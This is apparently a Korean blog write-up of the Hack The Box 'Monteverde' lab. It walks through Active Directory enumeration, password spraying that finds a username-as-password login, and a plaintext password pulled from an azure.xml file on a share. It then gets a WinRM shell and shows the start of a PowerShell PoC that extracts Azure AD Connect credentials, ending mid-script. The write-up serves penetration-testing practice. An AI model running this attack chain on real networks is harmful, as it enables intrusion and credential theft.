Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 레나튜토리얼
- flask blueprint
- tuple
- set
- portswigger
- flask설치
- 삼성클라우드오류
- 멀티컨트롤오류
- 삼성노트동기화오류
- 파이썬
- 리버스엔지니어링
- 레나튜토리얼.
- 플라스크 애플리케이션 팩토리
- 리버싱
- Python
- 리버스 엔지니어링
- flask 구조
- 오블완
- flask
- AQ
- 클립보드간공유기능
- L
- pe구조
- 숫자분리
- 플라스크
- 티스토리챌린지
- 포트스캐너
- NMAP
Archives
- Today
- Total
정보보안
Monteverde 본문
1. Nmap
$ nmap -p- --open --max-retries 2 -Pn -n 10.129.228.111 -oA fullscan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:10 KST
Nmap scan report for 10.129.228.111
Host is up (0.085s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49693/tcp open unknown
60578/tcp open unknown$ nmap -sV -sC -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49676,49693,60578 -min-rate 5000 -oA alltcp -Pn 10.129.228.111
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-17 07:21:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
60578/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-17T07:21:58
|_ start_date: N/A
|_clock-skew: -10s$ nmap --script vuln -oA script 10.129.228.111 -Pn -n
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:10 KST
Nmap scan report for 10.129.228.111
Host is up (0.088s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false$ sudo nmap -sU -oA alludp 10.129.228.111 -p- --min-rate 5000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:22 KST
Nmap scan report for 10.129.228.111
Host is up (0.092s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntpSMB Enum
$ crackmapexec smb 10.129.228.111 -u '' -p '' --shares
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.129.228.111 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIEDenum4linux
$ enum4linux -a 10.129.228.111
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Sep 17 16:28:16 2023
=========================================( Target Information )=========================================
Target ........... 10.129.228.111
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.228.111 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.228.111 )===============================
Looking up status of 10.129.228.111
No reply from 10.129.228.111
==================================( Session Check on 10.129.228.111 )==================================
[+] Server 10.129.228.111 allows sessions using username '', password ''
===============================( Getting domain SID for 10.129.228.111 )===============================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)
==================================( OS information on 10.129.228.111 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.228.111 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 10.129.228.111 )======================================
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
================================( Share Enumeration on 10.129.228.111 )================================
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.228.111
===========================( Password Policy Information for 10.129.228.111 )===========================
[+] Attaching to 10.129.228.111 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.228.111)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] MEGABANK
[+] Builtin
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
======================================( Groups on 10.129.228.111 )======================================
[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
group:[ADSyncAdmins] rid:[0x451]
group:[ADSyncOperators] rid:[0x452]
group:[ADSyncBrowse] rid:[0x453]
group:[ADSyncPasswordSet] rid:[0x454]
[+] Getting local group memberships:
Group: ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
[+] Getting domain group memberships:
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group: 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group: 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group: 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group: 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group: 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group: 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group: 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group: 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group: 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group: 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group: 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group: 'Domain Users' (RID: 513) has member: MEGABANK\smorganLDAP
$ crackmapexec ldap 10.129.228.111 -u '' -p '' --users | tee test.txt
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.129.228.111 389 MONTEVERDE [+] MEGABANK.LOCAL\:
LDAP 10.129.228.111 389 MONTEVERDE [*] Total of records returned 13
LDAP 10.129.228.111 389 MONTEVERDE Guest Built-in account for guest access to the computer/domain
LDAP 10.129.228.111 389 MONTEVERDE AAD_987d7f2f57d2 Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
LDAP 10.129.228.111 389 MONTEVERDE mhope
LDAP 10.129.228.111 389 MONTEVERDE SABatchJobs
LDAP 10.129.228.111 389 MONTEVERDE svc-ata
LDAP 10.129.228.111 389 MONTEVERDE svc-bexec
LDAP 10.129.228.111 389 MONTEVERDE svc-netapp
LDAP 10.129.228.111 389 MONTEVERDE dgalanos
LDAP 10.129.228.111 389 MONTEVERDE roleary
LDAP 10.129.228.111 389 MONTEVERDE smorgan
$ cat test.txt | tr -s ' ' | cut -d ' ' -f 5
[*]
[+]
[*]
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
가져온 username을 'users.txt'에 저장함.
$ vim users.txt
$ :set paste
$ cat users.txt
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorganuser이름만 알 경우 3가지 공격방법
- password spraying
- AS-REPRoasting
- password bruteforce
1. AS-REPRoasting 공격
ASREPRoasting은 일반적으로 관리자 계정이나 서비스 계정 중에서 Kerberos 사전 인증이 비활성화된 계정을 찾아 암호 해시를 찾아내는 공격으로, 사전 인증을 거치지 않고 TGS(Ticket-Granting Service)를 요청하는 사용자 계정의 암호 해시를 추출하는 방법을 이용함.
이후 별도의 해시 크래킹 도구나 레인보우 테이블을 사용하여 암호를 복구하거나 해시를 릴리스할 수 있음.
AS-REPRoasting 공격을 할 때는 impacket-GetNPUsers(Non-Pre-Authenticated Users) 스크립트를 사용하여 공격함.
impacket-GetNPUsers은 특정 도메인에서 ASREPRoasting을 수행하기 위해 사용되는 스크립트임.
impacket-GetNPUsers 사용법:
impacket-GetNPUsers [도메인]/'' -usersfile [유저이름파일] -outputfile [아웃풋될 파일] -dc-ip [targetIP]htb.local/'' : 대상 도메인을 지정함. 도메인은 htb.local이며 대상 사용자는 빈 문자열로, 모든 사용자 계정을 대상으로 한다는 의미.
-usersfile users.txt : 대상 사용자를 지정하는 사용자 이름 목록이 포함된 파일을 지정함. 일반적으로 ASREPRoasting 대상으로 지정할 사용자 계정 목록이 포함된 텍스트 파일의 파일 경로를 제공해야 함.
-outputfile asreproast.hash : 검색된 ASREPRoast 해시가 저장될 파일을 지정함. 이 경우 ASREPRoast 해시가 저장될 파일의 경로를 지정.
명령을 실행하면 실패한 것처럼 결과가 출력되나 ls로 확인해보면 정상적으로 파일이 생성된 것을 확인할 수 있음. 파일 내용 확인을 통해 결과를 확인해야 함
$ impacket-GetNPUsers MEGABANK.LOCAL/'' -usersfile users.txt -outputfile asreproast.hash -dc-ip 10.129.228.111
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
$ cat asreproast1.hash
>
빈 값으로 실패2. password bruteforce
사용자 이름과 비밀번호가 동일한 사람이 있는지 확인
$ crackmapexec smb target_ip -u users.txt -p users.txt --continue-on-success
>
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobsSABatchJobs:SABatchJobs를 찾아낼 수 있었음.
USER의 ID/PW를 알고있으니 해당 유저로 어떤 폴더에 액세스할 수 있는지 확인함.
$ smbmap -H 10.129.228.111 -d MEGABANK.LOCAL -u SABatchJobs -p SABatchJobs
[+] IP: 10.129.228.111:445 Name: 10.129.228.111
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLYusers$ 공유디렉터리 접속 후 azure.xml 파일을 빼냄
$ smbclient //10.129.228.111/users$ -U MEGABANK.LOCAL\\SABatchJobs%SABatchJobs
smb: \> ls
. D 0 Fri Jan 3 22:12:48 2020
.. D 0 Fri Jan 3 22:12:48 2020
dgalanos D 0 Fri Jan 3 22:12:30 2020
mhope D 0 Fri Jan 3 22:41:18 2020
roleary D 0 Fri Jan 3 22:10:30 2020
smorgan D 0 Fri Jan 3 22:10:24 2020
smb: \mhope\> ls
. D 0 Fri Jan 3 22:41:18 2020
.. D 0 Fri Jan 3 22:41:18 2020
azure.xml AR 1212 Fri Jan 3 22:40:23 2020
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)azure.xml을 확인하니 password가 발견됨.
$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
그러면 mhope의 password로 생각을 하면 될까??
아래 명령어가 정상적으로 먹히는 것 보니 mhope의 pw을 획득한 것이 맞다.
$ smbmap -H 10.129.228.111 -d MEGABANK.LOCAL -u mhope -p 4n0therD4y@n0th3r$ -R
[+] IP: 10.129.228.111:445 Name: 10.129.228.111
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
.\azure_uploads\*
dr--r--r-- 0 Fri Jan 3 21:43:36 2020 .
dr--r--r-- 0 Fri Jan 3 21:43:36 2020 ..
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 08:27:52 1601 lsass
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 scerpc
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-374-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 epmapper
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-1d4-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 eventlog
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-468-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 atsvc
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-5f4-0
fr--r--r-- 4 Mon Jan 1 08:27:52 1601 wkssvc
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-26c-0
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-26c-1
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 RpcProxy\49673
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 aca786102a7d4e91
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 RpcProxy\593
fr--r--r-- 5 Mon Jan 1 08:27:52 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 spoolss
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-8a4-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 netdfs
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 vgauth-service
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 ROUTER
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-25c-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 SQLLocal\MSSQLSERVER
fr--r--r-- 2 Mon Jan 1 08:27:52 1601 sql\query
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-aa8-0
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 CPFATP_2712_v4.0.30319
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 PSHost.133394071083938761.2712.DefaultAppDomain.miiserver
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-ab0-0
NETLOGON READ ONLY Logon server share
.\NETLOGON\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
SYSVOL READ ONLY Logon server share
.\SYSVOL\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 MEGABANK.LOCAL
.\SYSVOL\MEGABANK.LOCAL\*
dr--r--r-- 0 Fri Jan 3 07:11:34 2020 .
dr--r--r-- 0 Fri Jan 3 07:11:34 2020 ..
dr--r--r-- 0 Sun Sep 17 15:54:42 2023 DfsrPrivate
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Policies
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 scripts
.\SYSVOL\MEGABANK.LOCAL\Policies\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
fr--r--r-- 22 Fri Jan 3 21:47:23 2020 GPT.INI
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 MACHINE
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 USER
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 .
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Microsoft
fr--r--r-- 2792 Fri Jan 3 07:17:56 2020 Registry.pol
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 Scripts
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Windows NT
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\*
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 .
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 ..
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 Shutdown
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 Startup
.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
fr--r--r-- 22 Fri Jan 3 07:26:34 2020 GPT.INI
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 MACHINE
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 USER
.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Microsoft
.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Windows NT
users$ READ ONLY
.\users$\*
dr--r--r-- 0 Fri Jan 3 22:12:48 2020 .
dr--r--r-- 0 Fri Jan 3 22:12:48 2020 ..
dr--r--r-- 0 Fri Jan 3 22:15:23 2020 dgalanos
dr--r--r-- 0 Fri Jan 3 22:41:18 2020 mhope
dr--r--r-- 0 Fri Jan 3 22:14:56 2020 roleary
dr--r--r-- 0 Fri Jan 3 22:14:28 2020 smorgan
.\users$\mhope\*
dr--r--r-- 0 Fri Jan 3 22:41:18 2020 .
dr--r--r-- 0 Fri Jan 3 22:41:18 2020 ..
fw--w--w-- 1212 Fri Jan 3 23:59:24 2020 azure.xmlwinrm
crackmap을 통해 winrm이 가능할지 확인
$ crackmapexec winrm 10.129.228.111 -u mhope -p 4n0therD4y@n0th3r$
SMB 10.129.228.111 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.129.228.111 5985 MONTEVERDE [*] http://10.129.228.111:5985/wsman
WINRM 10.129.228.111 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)pwn3d!
evil-winrm를 통한 쉘 및 user flag 획득
$ evil-winrm -i 10.129.228.111 -u mhope -p 4n0therD4y@n0th3r$
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
flag
net user을 통해 mhope에 대해 알아보자. azure admins인 것을 확인할 수 있다.
*Evil-WinRM* PS C:\Users> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 9/17/2023 4:03:09 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.AZURE POC
https://blog.xpnsec.com/azuread-connect-for-redteam/
위 블로그에 접속하면 PoC가 있다. 해당 PoC를 칼리로 옮기고 대상에서 실행시킨다.
$ vim root.ps1
:set paste
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
